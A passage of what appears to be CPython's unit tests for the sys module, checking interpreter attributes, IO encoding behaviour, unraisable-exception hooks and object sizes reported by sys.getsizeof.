self.assertIn(main_id, d)
self.assertIn(thread_id, d)
self.assertEqual((None, None, None), d.pop(main_id))
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
exc_type, exc_value, exc_tb = d.pop(thread_id)
stack = traceback.extract_stack(exc_tb.tb_frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertTrue(sourceline.startswith("if leave_g.wait("))
# Reap the spawned thread.
leave_g.set()
t.join()
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
for arg in sys.argv:
self.assertIsInstance(arg, str)
self.assertIsInstance(sys.orig_argv, list)
for arg in sys.orig_argv:
self.assertIsInstance(arg, str)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash13", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
elif algo == 3:
self.assertEqual(sys.hash_info.algorithm, "siphash13")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash13", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.platlibdir, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global INTERN_NUMRUNS
INTERN_NUMRUNS += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(INTERN_NUMRUNS)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize",
"dont_write_bytecode", "no_user_site", "no_site",
"ignore_environment", "verbose", "bytes_warning", "quiet",
"hash_randomization", "isolated", "dev_mode", "utf8_mode",
"warn_default_encoding")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
attr_type = bool if attr == "dev_mode" else int
self.assertEqual(type(getattr(sys.flags, attr)), attr_type, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
self.assertIn(sys.flags.utf8_mode, {0, 1, 2})
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
arg = sys_attr
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type(arg)
with self.assertRaises(TypeError):
attr_type.__new__(attr_type, arg)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(os_helper.FS_NONASCII,
'requires OS support of non-ASCII encodings')
@unittest.skipUnless(sys.getfilesystemencoding() == locale.getpreferredencoding(False),
'requires FS encoding to match locale')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % os_helper.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(os_helper.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a nonexistent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, locale, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = locale
env["PYTHONCOERCECLOCALE"] = "0"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-X", "utf8=0", "-c", code]
if isolated:
args.append("-I")
if encoding is not None:
env['PYTHONIOENCODING'] = encoding
else:
env.pop('PYTHONIOENCODING', None)
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def check_locale_surrogateescape(self, locale):
out = self.c_locale_get_error_handler(locale, isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(locale, encoding=':ignore')
self.assertEqual(out,
'stdin: ignore\n'
'stdout: ignore\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='iso8859-1:')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# has no effect
out = self.c_locale_get_error_handler(locale, encoding=':')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
out = self.c_locale_get_error_handler(locale, encoding='')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_c_locale_surrogateescape(self):
self.check_locale_surrogateescape('C')
def test_posix_locale_surrogateescape(self):
self.check_locale_surrogateescape('POSIX')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.support.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
# Output of sys._debugmallocstats() depends on configure flags.
# The sysconfig vars are not available on Windows.
if sys.platform != "win32":
with_freelists = sysconfig.get_config_var("WITH_FREELISTS")
with_pymalloc = sysconfig.get_config_var("WITH_PYMALLOC")
if with_freelists:
self.assertIn(b"free PyDictObjects", err)
if with_pymalloc:
self.assertIn(b'Small block threshold', err)
if not with_freelists and not with_pymalloc:
self.assertFalse(err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
try:
import _testcapi
except ImportError:
with_pymalloc = support.with_pymalloc()
else:
try:
alloc_name = _testcapi.pymem_getallocatorsname()
except RuntimeError as exc:
# "cannot get allocators name" (ex: tracemalloc is used)
with_pymalloc = True
else:
with_pymalloc = (alloc_name in ('pymalloc', 'pymalloc_debug'))
# Some sanity checks
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_issue20602(self):
# sys.flags and sys.float_info were wiped during shutdown.
code = """if 1:
import sys
class A:
def __del__(self, sys=sys):
print(sys.flags)
print(sys.float_info)
a = A()
"""
rc, out, err = assert_python_ok('-c', code)
out = out.splitlines()
self.assertIn(b'sys.flags', out[0])
self.assertIn(b'sys.float_info', out[1])
def test_sys_ignores_cleaning_up_user_data(self):
code = """if 1:
import struct, sys
class C:
def __init__(self):
self.pack = struct.pack
def __del__(self):
self.pack('I', -42)
sys.x = C()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(rc, 0)
self.assertEqual(stdout.rstrip(), b"")
self.assertEqual(stderr.rstrip(), b"")
@unittest.skipUnless(hasattr(sys, 'getandroidapilevel'),
'need sys.getandroidapilevel()')
def test_getandroidapilevel(self):
level = sys.getandroidapilevel()
self.assertIsInstance(level, int)
self.assertGreater(level, 0)
def test_sys_tracebacklimit(self):
code = """if 1:
import sys
def f1():
1 / 0
def f2():
f1()
sys.tracebacklimit = %r
f2()
"""
def check(tracebacklimit, expected):
p = subprocess.Popen([sys.executable, '-c', code % tracebacklimit],
stderr=subprocess.PIPE)
out = p.communicate()[1]
self.assertEqual(out.splitlines(), expected)
traceback = [
b'Traceback (most recent call last):',
b' File "<string>", line 8, in <module>',
b' File "<string>", line 6, in f2',
b' File "<string>", line 4, in f1',
b'ZeroDivisionError: division by zero'
]
check(10, traceback)
check(3, traceback)
check(2, traceback[:1] + traceback[2:])
check(1, traceback[:1] + traceback[3:])
check(0, [traceback[-1]])
check(-1, [traceback[-1]])
check(1<<1000, traceback)
check(-1<<1000, [traceback[-1]])
check(None, traceback)
def test_no_duplicates_in_meta_path(self):
self.assertEqual(len(sys.meta_path), len(set(sys.meta_path)))
@unittest.skipUnless(hasattr(sys, "_enablelegacywindowsfsencoding"),
'needs sys._enablelegacywindowsfsencoding()')
def test__enablelegacywindowsfsencoding(self):
code = ('import sys',
'sys._enablelegacywindowsfsencoding()',
'print(sys.getfilesystemencoding(), sys.getfilesystemencodeerrors())')
rc, out, err = assert_python_ok('-c', '; '.join(code))
out = out.decode('ascii', 'replace').rstrip()
self.assertEqual(out, 'mbcs replace')
def test_orig_argv(self):
code = textwrap.dedent('''
import sys
print(sys.argv)
print(sys.orig_argv)
''')
args = [sys.executable, '-I', '-X', 'utf8', '-c', code, 'arg']
proc = subprocess.run(args, check=True, capture_output=True, text=True)
expected = [
repr(['-c', 'arg']), # sys.argv
repr(args), # sys.orig_argv
]
self.assertEqual(proc.stdout.rstrip().splitlines(), expected,
proc)
def test_module_names(self):
self.assertIsInstance(sys.stdlib_module_names, frozenset)
for name in sys.stdlib_module_names:
self.assertIsInstance(name, str)
def test_stdlib_dir(self):
os = import_helper.import_fresh_module('os')
marker = getattr(os, '__file__', None)
if marker and not os.path.exists(marker):
marker = None
expected = os.path.dirname(marker) if marker else None
self.assertEqual(os.path.normpath(sys._stdlib_dir),
os.path.normpath(expected))
@test.support.cpython_only
class UnraisableHookTest(unittest.TestCase):
def write_unraisable_exc(self, exc, err_msg, obj):
import _testcapi
import types
err_msg2 = f"Exception ignored {err_msg}"
try:
_testcapi.write_unraisable_exc(exc, err_msg, obj)
return types.SimpleNamespace(exc_type=type(exc),
exc_value=exc,
exc_traceback=exc.__traceback__,
err_msg=err_msg2,
object=obj)
finally:
# Explicitly break any reference cycle
exc = None
def test_original_unraisablehook(self):
for err_msg in (None, "original hook"):
with self.subTest(err_msg=err_msg):
obj = "an object"
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
self.write_unraisable_exc(ValueError(42), err_msg, obj)
err = stderr.getvalue()
if err_msg is not None:
self.assertIn(f'Exception ignored {err_msg}: {obj!r}\n', err)
else:
self.assertIn(f'Exception ignored in: {obj!r}\n', err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('ValueError: 42\n', err)
def test_original_unraisablehook_err(self):
# bpo-22836: PyErr_WriteUnraisable() should give sensible reports
class BrokenDel:
def __del__(self):
exc = ValueError("del is broken")
# The following line is included in the traceback report:
raise exc
class BrokenStrException(Exception):
def __str__(self):
raise Exception("str() is broken")
class BrokenExceptionDel:
def __del__(self):
exc = BrokenStrException()
# The following line is included in the traceback report:
raise exc
for test_class in (BrokenDel, BrokenExceptionDel):
with self.subTest(test_class):
obj = test_class()
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
# Trigger obj.__del__()
del obj
report = stderr.getvalue()
self.assertIn("Exception ignored", report)
self.assertIn(test_class.__del__.__qualname__, report)
self.assertIn("test_sys.py", report)
self.assertIn("raise exc", report)
if test_class is BrokenExceptionDel:
self.assertIn("BrokenStrException", report)
self.assertIn("<exception str() failed>", report)
else:
self.assertIn("ValueError", report)
self.assertIn("del is broken", report)
self.assertTrue(report.endswith("\n"))
def test_original_unraisablehook_exception_qualname(self):
# See bpo-41031, bpo-45083.
# Check that the exception is printed with its qualified name
# rather than just classname, and the module names appears
# unless it is one of the hard-coded exclusions.
class A:
class B:
class X(Exception):
pass
for moduleName in 'builtins', '__main__', 'some_module':
with self.subTest(moduleName=moduleName):
A.B.X.__module__ = moduleName
with test.support.captured_stderr() as stderr, \
test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
expected = self.write_unraisable_exc(
A.B.X(), "msg", "obj");
report = stderr.getvalue()
self.assertIn(A.B.X.__qualname__, report)
if moduleName in ['builtins', '__main__']:
self.assertNotIn(moduleName + '.', report)
else:
self.assertIn(moduleName + '.', report)
def test_original_unraisablehook_wrong_type(self):
exc = ValueError(42)
with test.support.swap_attr(sys, 'unraisablehook',
sys.__unraisablehook__):
with self.assertRaises(TypeError):
sys.unraisablehook(exc)
def test_custom_unraisablehook(self):
hook_args = None
def hook_func(args):
nonlocal hook_args
hook_args = args
obj = object()
try:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
expected = self.write_unraisable_exc(ValueError(42),
"custom hook", obj)
for attr in "exc_type exc_value exc_traceback err_msg object".split():
self.assertEqual(getattr(hook_args, attr),
getattr(expected, attr),
(hook_args, expected))
finally:
# expected and hook_args contain an exception: break reference cycle
expected = None
hook_args = None
def test_custom_unraisablehook_fail(self):
def hook_func(*args):
raise Exception("hook_func failed")
with test.support.captured_output("stderr") as stderr:
with test.support.swap_attr(sys, 'unraisablehook', hook_func):
self.write_unraisable_exc(ValueError(42),
"custom hook fail", None)
err = stderr.getvalue()
self.assertIn(f'Exception ignored in sys.unraisablehook: '
f'{hook_func!r}\n',
err)
self.assertIn('Traceback (most recent call last):\n', err)
self.assertIn('Exception: hook_func failed\n', err)
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testinternalcapi
self.gc_headsize = _testinternalcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('5P'))
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# bytes
check(b'', vsize('n') + 1)
check(b'x' * 10, vsize('n') + 11)
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
def check_code_size(a, expected_size):
self.assertGreaterEqual(sys.getsizeof(a), expected_size)
check_code_size(get_cell().__code__, size('6i13P'))
check_code_size(get_cell.__code__, size('6i13P'))
def get_cell2(x):
def inner():
return x
return inner
check_code_size(get_cell2.__code__, size('6i13P') + calcsize('n'))
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PPP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# empty dict
check({}, size('nQ2P'))
# dict
check({"a": 1}, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 8 + (8*2//3)*calcsize('n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('nQ2P') + calcsize(DICT_KEY_STRUCT_FORMAT) + 16 + (16*2//3)*calcsize('n2P'))
# dictionary-keyview
check({}.keys(), size('P'))
# dictionary-valueview
check({}.values(), size('P'))
# dictionary-itemview
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictionary-keyiterator
check(iter({}.keys()), size('P2nPn'))
# dictionary-valueiterator
check(iter({}.values()), size('P2nPn'))
# dictionary-itemiterator
check(iter({}.items()), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
x = inspect.currentframe()
check(x, size('3Pi3c'))
# function
def func(): pass
check(func, size('14Pi'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('P2PPP4P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(list(sample), vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('5Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('nP'))
check(frozenset(sample), s + newsize*calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
fmt = 'P2nPI13Pl4Pn9Pn12PIPP'
s = vsize(fmt)
check(int, s)
# class
s = vsize(fmt + # PyTypeObject
'4P' # PyAsyncMethods
'36P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'2P' # PyBufferProcs
'6P')
class newstyleclass(object): pass
# Separate block for PyDictKeysObject with 8 keys and 5 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 15*self.P)
o = newstyleclass()
o.a = o.b = o.c = o.d = o.e = o.f = o.g = o.h = 1
# Separate block for PyDictKeysObject with 16 keys and 10 entries
check(newstyleclass, s + calcsize(DICT_KEY_STRUCT_FORMAT) + 32 + 21*calcsize("n2P"))
# dict with shared keys
check(newstyleclass().__dict__, size('nQ2P') + 13*self.P)
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
